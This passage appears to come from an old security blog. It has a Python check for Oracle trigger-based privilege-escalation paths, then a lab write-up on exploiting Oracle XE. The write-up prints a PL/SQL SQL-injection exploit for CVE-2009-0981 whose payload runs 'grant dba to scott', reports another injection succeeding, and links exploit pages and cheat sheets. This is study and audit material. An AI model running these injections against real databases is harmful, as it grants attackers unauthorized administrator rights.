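DBA_ROLE_ROWS = [("SYS",), ("SYSTEM",), ("SYSMAN",)]
PUBLIC_INSERT_ROWS = [("SYSTEM", "OL$"), ("SYSTEM", "DEF$_TEMP$LOB"),
                      ("SYS", "DUAL"), ("SCOTT", "EMP")]
CREATE_ANY_TRIGGER_ROWS = [("SYS",), ("SYSTEM",), ("MDSYS",), ("WMSYS",)]


def find_escalation_paths(dba_rows, public_insert_rows, trigger_rows):
    """Return one finding per (intermediary, target table) pair.

    A target table must be owned by a DBA-role account other than SYS: CREATE
    ANY TRIGGER does not reach SYS objects, so no trigger can be planted there,
    while a trigger owned by any other DBA runs with that DBA's privileges.
    An intermediary is any CREATE ANY TRIGGER holder that is not itself a DBA
    (an account that already is a DBA has nothing to escalate to)."""
    dbas = {row[0] for row in dba_rows}
    targets = sorted({(owner, table) for owner, table in public_insert_rows
                      if owner in dbas and owner != "SYS"})
    intermediaries = sorted({row[0] for row in trigger_rows} - dbas)
    return [{"intermediary": user, "target": "%s.%s" % (owner, table)}
            for user in intermediaries for owner, table in targets]


def remediation(findings):
    """Least-privilege fixes suggested per finding. Revoking PUBLIC INSERT on
    Oracle-internal tables can break the feature that uses them (OL$ backs
    stored outlines), so treat these as review items, not a script to run."""
    revokes = sorted({"REVOKE INSERT ON %s FROM PUBLIC;" % f["target"]
                      for f in findings})
    review = sorted({"-- review CREATE ANY TRIGGER held by %s" % f["intermediary"]
                     for f in findings})
    return revokes + review
```

On the constructed rows the check pairs MDSYS and WMSYS with SYSTEM.OL$ and SYSTEM.DEF$_TEMP$LOB and ignores SYS.DUAL and SCOTT.EMP; whether any of the intermediaries actually owns an injectable trigger (step 3) still has to be checked by hand, since that is a code-review question rather than a catalog one.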

Attention
Again, this attack does not work against Oracle XE, because of the differences between the Standard Edition and XE.

Reference
It is good to study the msf code; it cleared several doubts in my head about the working mechanism:
http://www.metasploit.com/modules/auxiliary/sqli/oracle/droptable_trigger
http://www.red-database-security.com/exploits/oracle_mdsys_sdo_topo_drop_ftbl.html

Saturday, October 30, 2010

Oracle XE Express Edition

Recently I have had to deal with Oracle XE (Express Edition), and it is the right time to take some notes after doing tons of reading on the topic, especially the long study of the differences between Oracle and Oracle XE.

Introduction
How to check the version number of an Oracle database?
(a) Use OUI (Oracle Universal Installer)
(b) select * from v$version;

What Is the Relation of a User Account and a Schema?
User accounts and schemas have a one-to-one relation. When you create a user, you are also implicitly creating a schema for that user. A schema is a logical container for the database objects (such as tables, views, triggers, and so on) that the user creates. The schema name is the same as the user name, and can be used to unambiguously refer to objects owned by the user.

Exploitation
1. CVE-2009-0981 Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Vulnerability
After installing a fresh Oracle XE, I tried to play with CVE-2009-0981, the Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL injection vulnerability. The exploit code is from http://www.red-database-security.com/exploits/oracle_sys_lt_compressworkspacetree2.html.

The issue is a lack of input sanitisation in the COMPRESSWORKSPACETREE procedure: code can be injected into the procedure and the privilege escalation succeeds. The procedure is owned by SYS or WMSYS.

The result was always a failure for me, after several tries.
C:\Users>sqlplus

SQL*Plus: Release 10.2.0.1.0 - Production on Sat Oct 30 23:57:21 2010

Copyright (c) 1982, 2005, Oracle. All rights reserved.

Enter user-name: user1
Enter password:

Connected to:
Oracle Database 10g Express Edition Release 10.2.0.1.0 - Production

SQL> DECLARE
2 D NUMBER;
3 BEGIN
4 D := DBMS_SQL.OPEN_CURSOR;
5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction;
begin execute immediate ''grant dba to scott'';commit;end;',0);
6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
8 end;
9 /
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
*
ERROR at line 6:
ORA-06550: line 6, column 1:
PLS-00201: identifier 'SYS.LT' must be declared
ORA-06550: line 6, column 1:
PL/SQL: Statement ignored
ORA-06550: line 7, column 1:
PLS-00201: identifier 'SYS.LT' must be declared
ORA-06550: line 7, column 1:
PL/SQL: Statement ignored

After some Googling, I realised there are big differences between Oracle Standard Edition and XE, from http://www.dba-oracle.com/t_xe_features_oracle_express.htm. In this case, the COMPRESSWORKSPACETREE procedure belongs to the LT package of Oracle Workspace Manager. Unfortunately Oracle Workspace Manager does not exist in Oracle XE! This is the reason why the exploit failed: the vulnerability does not even exist in Oracle XE.

Clear. Let's move on!

2. SQL Injection via Oracle DBMS_EXPORT_EXTENSION in Oracle 9i / 10g
The vulnerability was found in 2006 and I guess it cannot be found in the wild now. But the good news is that Oracle never issues any Critical Patch Update (CPU) for Oracle XE. So this vulnerability exists, and the exploit worked well!

For further details about this issue, please refer to http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html

My favourites

To summarise the Oracle exploitation methodology, these are my favourites and among the most comprehensive cheat sheets:
http://www.red-database-security.com/wp/oracle_cheat.pdf
http://www.red-database-security.com/wp/hacking_and_hardening_oracle_XE.pdf